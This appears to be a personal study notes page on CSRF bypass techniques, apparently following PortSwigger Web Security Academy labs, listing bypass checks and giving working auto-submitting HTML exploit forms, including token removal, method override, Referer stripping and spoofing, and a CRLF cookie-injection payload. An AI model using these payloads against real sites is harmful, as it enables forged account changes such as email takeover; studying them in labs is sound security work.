csrf

CSRF bybass methods

  • NO csrf token

  • weak csrf token

  • check content type

  • check referer header

  • chnage POST to GET or GET to post

CSRF token bybass methods

  • reomving ANI-csrf token

  • NO check for the users token

  • weak token

  • Reasuable token

  • change request method

  • Guessable token

  • Bybass referer

method attacks

  • remove referer header and send request and check response

  • remove original header and send request and check response

  • remove csrf token and send request and check response

Basic method no defenses

  • the request

POST /myaccount/changeemail
HOST:


email=....

  • the exploit

<form action="" method="POST">
<input type="hidden" name="email" value="">
</form>
<script>
 document.forms[0].submit();
</script>

CSRF where token validation depends on token being present

  • the request

POST /myaccount/changeemail
HOST:


email=....&csrftoken=.....

  • TIPS: reomve the csrf token -THE exploit

<form action="" method="POST">
<input type="hidden" name="email" value="">
</form>
<script>
 document.forms[0].submit();
</script>

CSRF where token validation depends on request method

  • the request

POST /myaccount/changeemail
HOST:


email=....&csrftoken=.....

  • TIPS: reomve the csrf token

  • Tips: change request TO GET in CSRF payloads -THE exploit

<form action="" method="GET">
<input type="hidden" name="email" value="">
</form>
<script>
 document.forms[0].submit();
</script>

CSRF where token is not tied to user session

  • steps 1- create two accounts 2- go to the first account and change email we will change 3- go to second account and try intersept change email then drop request , copy the csrf token 4- go to the first account and put csrf token(second account) and try change email is valid or not

csrf bypass via method override

<html>
<body>
   <script>history.pushState(' ', ' ' ,'/')</script>
   <form action="" method="GET">
   <input type="hidden" name="_method" value="POST">
   <input type="hidden" name="email" value="">
   </form>
   <script>
   document.forms[0].submit();
   </script>
</body>
</html>

CSRF where token is duplicated in cookie

<html>
<body>
   <script>history.pushState(' ',' ','/')</script>
   <form action="https://0a6a006c04de5fc7829147ec00750057.web-security-academy.net/my-account/change-email" method="POST"/>
   <input type="hidden" name="email" value="a@gmail.com"/>
   <input type="hidden" name="csrf" value="fake"/>
   <input type="submit" value="submit request"/>
   </form>
   <img src="https://0a6a006c04de5fc7829147ec00750057.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
   </body>
</html>

CSRF where Referer validation depends on header being present

<html>
<head>
   <meta name="referrer" content="no-referrer" >
</head>
<body>
   <script>history.pushState(' ', ' ' ,'/')</script>
   <form action="https://0a390078039fe0a780e435a600ca0059.web-security-academy.net/my-account/change-email" method="POST">
   <input type="hidden" name="email" value="a@gmail.com">
   <input type="submit" value="submit" >
   </form>
   <script>
   document.forms[0].submit();
   </script>
</body>
</html>

CSRF with broken Referer validation

<html>
<body>
   <script>history.pushState(' ', ' ' ,'/?0ad4003504bb812580aae57c00c40072.web-security-academy.net')</script>
   <form action="https://0ad4003504bb812580aae57c00c40072.web-security-academy.net/my-account/change-email" method="POST">
   <input type="hidden" name="email" value="a@gmail.com">
   <input type="submit" value="submit" >
   </form>
   <script>
   document.forms[0].submit();
   </script>
</body>
</html>
PreviousATONextexif_geo

Last updated